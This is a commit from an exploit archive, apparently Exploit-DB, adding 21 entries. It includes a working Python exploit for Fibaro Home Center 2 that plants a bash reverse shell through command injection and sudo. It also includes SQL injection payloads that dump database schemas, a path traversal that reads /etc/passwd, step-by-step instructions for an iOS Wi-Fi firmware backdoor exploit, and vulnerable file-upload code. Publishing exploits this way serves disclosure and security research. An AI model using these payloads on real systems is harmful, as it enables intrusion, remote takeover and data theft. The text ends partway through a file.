DB: 2017-09-28

21 new exploits Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing Adobe Flash - Out-of-Bounds Read in applyToRange CyberArk Viewfinity 5.5.10.95 - Privilege Escalation PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response Tiny HTTPd 0.1.0 - Directory Traversal Free PHP photo Gallery script - Remote File Inclusion Free PHP Photo Gallery Script - Remote File Inclusion WordPress Plugin School Management System - SQL Injection iTech Dating Script 3.40 - SQL Injection iTech Job Script 9.27 - SQL Injection WordPress Plugin Content Timeline - SQL Injection Job Links - Arbitrary File Upload TicketPlus - Arbitrary File Upload Photo Fusion - Arbitrary File Upload SMSmaster - SQL Injection AMC Master - Arbitrary File Upload WordPress Plugin WPCHURCH - SQL Injection WordPress Plugin WPGYM - SQL Injection WordPress Plugin Hospital Management System - SQL Injection Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation WordPress Plugin WPAMS - SQL Injection
2017-09-28 05:01:27 +00:00 · 2017-09-28 05:01:27 +00:00 · ec599357c0
commit ec599357c0
parent a06626c22f
22 changed files with 769 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -5685,6 +5685,9 @@ id,file,description,date,author,platform,type,port
 42764,platforms/windows/dos/42764.html,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes",2017-09-21,"Google Security Research",windows,dos,0
 42765,platforms/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'",2017-09-21,"Google Security Research",windows,dos,0
 42766,platforms/windows/dos/42766.html,"Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses",2017-09-21,"Google Security Research",windows,dos,0
 42781,platforms/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",multiple,dos,0
 42782,platforms/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos,0
 42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9215,6 +9218,7 @@ id,file,description,date,author,platform,type,port
 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
 42319,platforms/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Privilege Escalation",2017-07-13,geoda,windows,local,0
 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
 42356,platforms/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",linux,local,0
@ -9236,6 +9240,7 @@ id,file,description,date,author,platform,type,port
 42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
 42521,platforms/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local,0
 42536,platforms/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
 42537,platforms/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution",2017-08-21,"Daniele Votta",windows,local,0
 42538,platforms/windows/local/42538.py,"Disk Savvy Enterprise 9.9.14 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
 42539,platforms/windows/local/42539.py,"VX Search Enterprise 9.9.12 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
 42540,platforms/windows/local/42540.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)",2017-08-22,Metasploit,windows,local,0
@ -15852,7 +15857,9 @@ id,file,description,date,author,platform,type,port
 42778,platforms/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,windows,remote,80
 42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80
 42780,platforms/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",windows,remote,0
 42784,platforms/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",ios,remote,0
 42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0
 42790,platforms/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",linux,remote,0
 42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
@ -24447,7 +24454,7 @@ id,file,description,date,author,platform,type,port
 14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0
 14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0
 14437,platforms/php/webapps/14437.txt,"Free PHP photo Gallery script - Remote Command Execution",2010-07-22,"ViRuS Qalaa",php,webapps,0
-14438,platforms/php/webapps/14438.txt,"Free PHP photo Gallery script - Remote File Inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0
+14438,platforms/php/webapps/14438.txt,"Free PHP Photo Gallery Script - Remote File Inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0
 14439,platforms/php/webapps/14439.txt,"phpBazar Admin - Information Disclosure",2010-07-22,Net_Spy,php,webapps,0
 14440,platforms/php/webapps/14440.txt,"phpBB MOD 2.0.19 - Invitation Only (PassCode Bypass)",2010-07-22,Silic0n,php,webapps,0
 14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,php,webapps,0
@ -38123,6 +38130,7 @@ id,file,description,date,author,platform,type,port
 41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
 42804,platforms/php/webapps/42804.txt,"WordPress Plugin School Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
 42547,platforms/hardware/webapps/42547.py,"Wireless Repeater BE126 - Local File Inclusion",2017-08-23,"Hay Mizrachi",hardware,webapps,0
 42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
@ -38419,6 +38427,8 @@ id,file,description,date,author,platform,type,port
 42510,platforms/php/webapps/42510.txt,"iTech Freelancer Script 5.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42511,platforms/php/webapps/42511.txt,"iTech Travel Script 9.49 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42513,platforms/php/webapps/42513.txt,"iTech Multi Vendor Script 6.63 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42514,platforms/php/webapps/42514.txt,"iTech Dating Script 3.40 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42515,platforms/php/webapps/42515.txt,"iTech Job Script 9.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
 42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
 42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
@ -38565,3 +38575,14 @@ id,file,description,date,author,platform,type,port
 42788,platforms/hardware/webapps/42788.txt,"FLIR Thermal Camera FC-S/PT - Command Injection",2017-09-25,LiquidWorm,hardware,webapps,0
 42789,platforms/hardware/webapps/42789.txt,"FLIR Thermal Camera F/FC/PT/D - Stream Disclosure",2017-09-25,LiquidWorm,hardware,webapps,0
 42792,platforms/asp/webapps/42792.txt,"Sitefinity CMS 9.2 - Cross-Site Scripting",2017-08-31,"Pralhad Chaskar",asp,webapps,0
 42794,platforms/php/webapps/42794.txt,"WordPress Plugin Content Timeline - SQL Injection",2017-09-16,"Jeroen - IT Nerdbox",php,webapps,0
 42795,platforms/php/webapps/42795.txt,"Job Links - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
 42796,platforms/php/webapps/42796.txt,"TicketPlus - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
 42797,platforms/php/webapps/42797.txt,"Photo Fusion - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
 42798,platforms/php/webapps/42798.txt,"SMSmaster - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
 42799,platforms/php/webapps/42799.txt,"AMC Master - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
 42800,platforms/php/webapps/42800.txt,"WordPress Plugin WPCHURCH - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
 42801,platforms/php/webapps/42801.txt,"WordPress Plugin WPGYM - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
 42802,platforms/php/webapps/42802.txt,"WordPress Plugin Hospital Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
 42884,platforms/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,multiple,webapps,0
 42805,platforms/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
--- a/platforms/ios/remote/42784.txt
+++ b/platforms/ios/remote/42784.txt
@ -0,0 +1,35 @@
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1289
 The exploit gains code execution on the Wi-Fi firmware on the iPhone 7.
 The exploit has been tested against the Wi-Fi firmware as present on iOS 10.2 (14C92), but should work on all versions of iOS up to 10.3.3 (included). However, some symbols might need to be adjusted for different versions of iOS, see "exploit/symbols.py" for more information.
 Upon successful execution of the exploit, a backdoor is inserted into the firmware, allowing remote read/write commands to be issued to the firmware via crafted action frames (thus allowing easy remote control over the Wi-Fi chip). 
 The attached archive contains the following directories:
  -hostapd-2.6 - A modified version of hostapd utilised in the exploit. This version of hostapd is configured to
                 support 802.11k RRM, and in particular Neighbor Reports. Moreover, this version of hostapd is
                 instrumented to add various commands, allowing injection and reception of crafted action frames
                 used throughout the exploit.
  -exploit     - The exploit itself.
 To run the exploit, you must execute the following steps:
  -Connect (and enable) a SoftMAC Wi-Fi dongle to your machine (such as the TL-WN722N)
  -Compile the provided version of hostapd
  -Modify the "interface" setting under "hostapd-2.6/hostapd/hostapd.conf" to match your interface's name
  -Configure the following settings under "exploit/conf.py":
    -HOSTAPD_DIR - The directory of the hostapd binary compiled above
    -TARGET_MAC  - The MAC address of the device being exploited
    -AP_MAC      - The MAC address of your wireless dongle
    -INTERFACE   - The name of the wireless dongle's interface
  -Assemble the backdoor shellcode by running "exploit/assemble_backdoor.sh"
  -Run hostapd with the configuration file provided above, broadcasting a Wi-Fi network ("test80211k")
  -Connect the target device to the network
  -Run "exploit/attack.py"
 Following the steps above should result in installation of a simple backdoor allowing read/write access to the firmware. You can interact with the backdoor to gain R/W access to the firmware by calling the "read_dword" and "write_dword" functions, respectively.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42784.zip
--- a/platforms/linux/remote/42790.txt
+++ b/platforms/linux/remote/42790.txt
@ -0,0 +1,33 @@
 #======================================================================================
 # Exploit Author: Touhid M.Shaikh
 # Exploit Title: Tiny HTTPd 0.1.0 Local File Traversal
 # Date: 26-09-2017
 # Website: www.touhidshaikh.com
 # Vulnerable Software:  Tiny HTTPd
 # Version: 0.1.0
 # Download Link:
 https://sourceforge.net/projects/tinyhttpd/?source=directory
 #======================================================================================
 # To reproduce the exploit:
 #   1. run the #./httpd
 #   2. #nc localhost 44123
 # GET /../../../../../../../../../../../etc/passwd HTTP/1.1
 #==========
 #Responce
 #==========
 HTTP/1.0 200 OK
 Server: jdbhttpd/0.1.0
 Content-Type: text/html
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 ---------------------snip---------------------------
--- a/platforms/multiple/dos/42781.txt
+++ b/platforms/multiple/dos/42781.txt
@ -0,0 +1,8 @@
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1321
 The attached MP4 file causes an out-of-bounds memory access when played in flash player.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42781.zip
--- a/platforms/multiple/dos/42782.txt
+++ b/platforms/multiple/dos/42782.txt
@ -0,0 +1,8 @@
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1322
 The attached fuzzed MP4 file causes an out-of-bounds memory access when played with Adobe Flash 
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42782.zip
--- a/platforms/multiple/dos/42783.txt
+++ b/platforms/multiple/dos/42783.txt
@ -0,0 +1,8 @@
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1323
 The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42783.zip
--- a/platforms/multiple/webapps/42884.py
+++ b/platforms/multiple/webapps/42884.py
@ -0,0 +1,45 @@
 #!/usr/bin/python
 import requests
 import argparse
 import urllib
 import base64
 import tarfile
 import os
 parser = argparse.ArgumentParser(description='Fibaro RCE')
 parser.add_argument('--rhost')
 parser.add_argument('--lhost')
 parser.add_argument('--lport')
 args = parser.parse_args()
 f = open('run.sh', 'w')
 f.write('#!/bin/bash\n')
 f.write('/bin/bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\n')
 f.close()
 os.chmod('run.sh', 0777)
 tar = tarfile.open("root.tar.gz", "w:gz")
 tar.add("run.sh")
 tar.close()
 with open("root.tar.gz", "rb") as tarfile:
 tar64 = base64.b64encode(tarfile.read())
 wwwexec = urllib.quote_plus(base64.b64encode("echo '" + tar64 + "' | base64 -d > /tmp/patch.tar.gz && sudo update --manual /tmp/patch.tar.gz"))
 os.remove('run.sh')
 os.remove('root.tar.gz')
 headers = {
 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0',
 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
 'X-Fibaro-Version': '2',
 'X-Requested-With': 'XMLHttpRequest',
 }
 data = 'deviceID=1&deviceName=&deviceType=&cmd1=`echo${IFS}' + wwwexec + '|base64${IFS}-d|/bin/bash`&cmd2=&roomID=1&roomName=&sectionID=&sectionName=&lang=en'
 print "[+] Popping a root shell..."
 requests.post('http://' + args.rhost + '/services/liliSetDeviceCommand.php', headers=headers, data=data, verify=False)
--- a/platforms/php/webapps/42514.txt
+++ b/platforms/php/webapps/42514.txt
@ -0,0 +1,28 @@
 # # # # #
 # Exploit Title: iTech Dating Script 3.40 - SQL Injection
 # Dork: N/A
 # Date: 18.08.2017
 # Vendor Homepage : http://itechscripts.com/
 # Software Link: http://itechscripts.com/dating-script/
 # Demo: http://dating.itechscripts.com/
 # Version: 3.40
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 #
 # Proof of Concept:
 #
 # http://localhost/[PATH]/see_more_details.php?id=[SQL]
 # -48+UNION(SELECT+0x283129,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929)--+-
 #
 # http://localhost/[PATH]/send_gift.php?id=[SQL]
 #
 # Etc...
 # # # # #
--- a/platforms/php/webapps/42515.txt
+++ b/platforms/php/webapps/42515.txt
@ -0,0 +1,28 @@
 # # # # #
 # Exploit Title: iTech Job Script 9.27 - SQL Injection
 # Dork: N/A
 # Date: 18.08.2017
 # Vendor Homepage : http://itechscripts.com/
 # Software Link: http://itechscripts.com/job-portal-script/
 # Demo: http://job-portal.itechscripts.com/
 # Version: 9.27
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 #
 # Proof of Concept:
 # 
 # http://localhost/[PATH]/Employer_Details.php?id=[SQL]
 # -3'++UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332--+-
 # 
 # http://localhost/[PATH]/Job_Details.php?id=[SQL]
 #
 # Etc...
 # # # # #
--- a/platforms/php/webapps/42794.txt
+++ b/platforms/php/webapps/42794.txt
@ -0,0 +1,65 @@
 # Exploit Title: Multiple Blind SQL Injections Wordpress Plugin: Content Timeline
 # Google Dork: -
 # Date: September 16, 2017
 # Exploit Author: Jeroen - ITNerdbox
 # Vendor Homepage: http://www.shindiristudio.com/
 # Software Link: https://codecanyon.net/item/content-timeline-responsive-wordpress-plugin-for-displaying-postscategories-in-a-sliding-timeline/3027163
 # Version: 4.4.2
 # Tested on: Linux / Nginx / Wordpress 4.8.1 / PHP 7.0.22
 # CVE : CVE-2017-14507
 ## Proof of Concept
 http(s)://www.target.tld/wp-admin/admin-ajax.php?action=ctimeline_frontend_get&timeline={inject here}
 ## Problem in file : content_timeline_class.php    
 function ajax_frontend_get(){
        $timelineId = $_GET['timeline'];
        $id = $_GET['id'];
        global $wpdb;
        if($timelineId) {
                $timeline = $wpdb->get_results('SELECT * FROM ' . $wpdb->prefix . 'ctimelines WHERE id='.$timelineId);
                $timeline = $timeline[0];
 Problem exists in the GET parameter called 'timeline' which is not sanitized and used in dynamically generating the
 SQL syntax.
 ## Problem in file : pages/content_timeline_edit.php
    if(isset($_GET['id'])) {
        global $wpdb;
        $timeline = $wpdb->get_results('SELECT * FROM ' . $wpdb->prefix . 'ctimelines WHERE id='.$_GET['id']);
 Problem exists in the GET parameter called 'id' which is not sanitized and used in dynamically generating the
 SQL syntax.
 ## Problem in file : pages/content_timeline_index.php
            if(isset($_GET['action']) && $_GET['action'] == 'delete') {
                $wpdb->query('DELETE FROM '. $prefix . 'ctimelines WHERE id = '.$_GET['id']);
            }
 Problem exists in the GET parameter called 'id' which is not sanitized and used in dynamically generating the
 SQL syntax.
 ## History
 09-16-2017        Contacted the author
 09-16-2017        Requested CVE-ID
 09-18-2017        CVE-ID Received
 09-18-2017        Contacted the author again
 09-26-2017 No reaction from author, thus releasing.
--- a/platforms/php/webapps/42795.txt
+++ b/platforms/php/webapps/42795.txt
@ -0,0 +1,63 @@
 # # # # # 
 # Exploit Title: Job Links - Complete Job Management Script - Arbitrary File Upload
 # Dork: N/A
 # Date: 26.09.2017
 # Vendor Homepage: http://teamworktec.com/
 # Software Link: https://codecanyon.net/item/job-links-complete-job-management-script/20672089
 # Demo: http://teamworktec.com/demo/job-links/
 # Version: N/A
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # 
 # The vulnerability allows an Job Seeker & Employer users upload arbitrary file....
 # 
 # Vulnerable Source:
 # 
 #      changes in user profile
 #      */
 #     public function profileChange(Request $request){
 #         $users =  User::find(Auth::id());
 #         if (!empty($request->avatar)) {
 #             $large_image = public_path('uploads/'.$users->avatar);
 #             File::delete($large_image);
 #             $file = $request->avatar;
 #             $users->avatar  = $file->getClientOriginalName();
 #             $users->save();
 #             $file->move('uploads', $file->getClientOriginalName());
 #             return $request->avatar->getClientOriginalName();
 #         } else
 #             return $users->avatar;
 #     }
 # 
 #     /*
 #      change Cover picture
 #      */
 #     public function coverChange(Request $request){
 #         $users =  User::find(Auth::id());
 # 
 #         if (!empty($request->cover)) {
 #             $large_image = public_path('uploads/'.$users->cover);
 #             File::delete($large_image);
 #             $file = $request->cover;
 #             $users->cover  = $file->getClientOriginalName();
 #             $users->save();
 #             $file->move('uploads', $file->getClientOriginalName());
 #             return $request->cover->getClientOriginalName();
 #         } else
 #             return $users->cover;
 #     }
 # 	
 # Proof of Concept: 
 # 
 # http://localhost/[PATH]/profile/[UserName]
 # http://localhost/[PATH]/uploads/[FILE]
 # 
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42796.txt
+++ b/platforms/php/webapps/42796.txt
@ -0,0 +1,48 @@
 # # # # # 
 # Exploit Title: TicketPlus - Support Ticket Management System - Arbitrary File Upload
 # Dork: N/A
 # Date: 26.09.2017
 # Vendor Homepage: http://teamworktec.com/
 # Software Link: https://codecanyon.net/item/ticketplus-support-ticket-management-system/20221316
 # Demo: http://sportsgrand.com/demo/ticket_plus/
 # Version: N/A
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # 
 # The vulnerability allows an users upload arbitrary file....
 # 
 # Vulnerable Source:
 # 
 #     public function updateProfile(Request $request) {
 #         $this->validate($request, [
 #             'name' => 'required|max:32',
 #             'username' => 'required|max:32|unique:users,username,'.Auth::id(),
 #             'email' => 'email|max:40|unique:users,email,'.Auth::id()
 #         ]);
 # 
 #         $user = User::find(Auth::id());
 #         $user->name = $request->name;
 #         $user->username = $request->username;
 #         $user->email = $request->email;
 #         if(!empty($request->file)){
 #             $request->file->move('uploads', $request->file->getClientOriginalName());
 #             $user->avatar = $request->file->getClientOriginalName();
 #         }
 #         $user->save();
 #         return redirect()->back()->withMessage('Profile updated successfully');
 #     }
 # 	
 # Proof of Concept: 
 # 
 # http://localhost/[PATH]/profile/settings
 # http://localhost/[PATH]/uploads/[FILE]
 # 
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42797.txt
+++ b/platforms/php/webapps/42797.txt
@ -0,0 +1,55 @@
 # # # # # 
 # Exploit Title: Photo Fusion - Free Stock Photos Script - Arbitrary File Upload
 # Dork: N/A
 # Date: 26.09.2017
 # Vendor Homepage: http://teamworktec.com/
 # Software Link: https://codecanyon.net/item/photo-fusion-free-stock-photos-script/20115244
 # Demo: http://teamworktec.com/demo/photos-fusion/
 # Version: N/A
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # 
 # The vulnerability allows an users upload arbitrary file....
 # 
 # Vulnerable Source:
 # 
 #     /*Change profile picture*/
 #     public function changeAvatar(Request $request){
 #         if(Auth::user()){
 #             $user = User::find(Auth::id());
 #             $user->avatar = $request->picture->getClientOriginalName();
 #             $user->save();
 #             $file = $request->picture;
 #             $file->move('uploads', $file->getClientOriginalName());
 #             return $request->picture->getClientOriginalName();
 #         }
 #         return 'please login to change avatar';
 #     }
 # 
 #     /*Change profile cover*/
 #     public function changeCover(Request $request){
 #         if(Auth::user()){
 #             $user = User::find(Auth::id());
 #             $user->cover = $request->cover->getClientOriginalName();
 #             $user->save();
 #             $file = $request->cover;
 #             $file->move('uploads', $file->getClientOriginalName());
 #             return $request->cover->getClientOriginalName();
 #         }
 #         return 'please login to change avatar';
 #     }
 # 	
 # Proof of Concept: 
 # 
 # http://localhost/[PATH]/
 # http://localhost/[PATH]/uploads/[FILE]
 # 
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42798.txt
+++ b/platforms/php/webapps/42798.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: SMSmaster – Multipurpose SMS Gateway for Wordpress - SQL Injection
 # Dork: N/A
 # Date: 26.09.2017
 # Vendor Homepage: http://mojoomla.com/
 # Software Link: https://codecanyon.net/item/smsmaster-multipurpose-sms-gateway-for-wordpress/20605853
 # Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/school/
 # Version: N/A
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an student users to inject sql commands....
 # 
 # Proof of Concept: 
 # 
 # http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
 # 
 # -23102%20UNION%20SELECT%201,2,3,4,5,(SELECT%20GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=DATABASE()),7,8--%20-
 # 
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42799.txt
+++ b/platforms/php/webapps/42799.txt
@ -0,0 +1,47 @@
 # # # # # 
 # Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload
 # Dork: N/A
 # Date: 26.09.2017
 # Vendor Homepage: http://mojoomla.com/
 # Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703
 # Demo: http://dasinfomedia.com.au/php/amc/
 # Version: N/A
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # 
 # The vulnerability allows an users upload arbitrary file....
 # 
 # Vulnerable Source:
 # 
 #         if(isset($id)){
 #             $user_d=$this->request->data;
 #             $this->row_update=$this->table_user->get($id);
 #             $this->set('emp_update_row',$this->row_update);
 # 
 #             if($this->request->is(['post','put'])){
 # 				
 # 				  $get_output=$this->check_update_email($this->row_update,$this->request->data('email'));
 # 							
 # 						if($get_output == true){
 # 
 #                 if(isset($_FILES['image']['name']) && !empty($_FILES['image']['name'])){
